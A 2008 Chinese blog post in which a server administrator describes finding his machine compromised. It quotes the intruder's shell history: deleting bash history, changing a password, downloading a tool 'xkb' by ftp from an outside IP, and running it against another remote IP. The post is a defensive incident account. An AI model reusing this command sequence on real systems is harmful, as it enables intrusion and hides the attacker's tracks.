ITPub博客

首页 > Linux操作系统 > Linux操作系统 > 关于xkb

关于xkb

原创 Linux操作系统 作者:regonly1 时间:2008-07-17 09:17:38 0 删除 编辑

今天系统ldap部分要增加一个节点,刚要开始执行,发现操作系统用户进不去了,怪了,已经是第二次被人家修改密码了。问了下知道这个密码的三个人,都没有动过。因此怀疑被黑了,查看了下历史记录:
    1  rm ~/.bash_history
    2  ls
    3  passwd
    4  cd /var/tmp
    5  ls
    6  uname -na
    7  ls
    8  ftp 71.18.107.183
    9  chmod +x xkb
   10  ./xkb 60.53.227.73:0
   11  uanem -na
   12  uname -na
   13  cd /var/tmp
   14  ls
   15  ./xkb 60.53.227.73:0
发现出现了一些不正常的登录信息,而且在此之前的信息都被rm掉了。肯定有问题了,ping了下sina,结果是通的。晕倒,原来这个机器一直在公网上裸奔啊!太危险了,查了下两个ip地址,发现第一个的归属地属于American,称为ARIN;第二个是马来西亚的,具体就不知道了;还好这次是普通用户密码,如果是root(我们限制了root不能以ssh登录),那就相当于把服务器送给他了,sunv890啊!

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/12932950/viewspace-402577/,如需转载,请注明出处,否则将追究法律责任。

下一篇: 一个高中同学
请登录后发表评论 登录
全部评论

注册时间:2008-05-10

  • 博文量
    257
  • 访问量
    1070070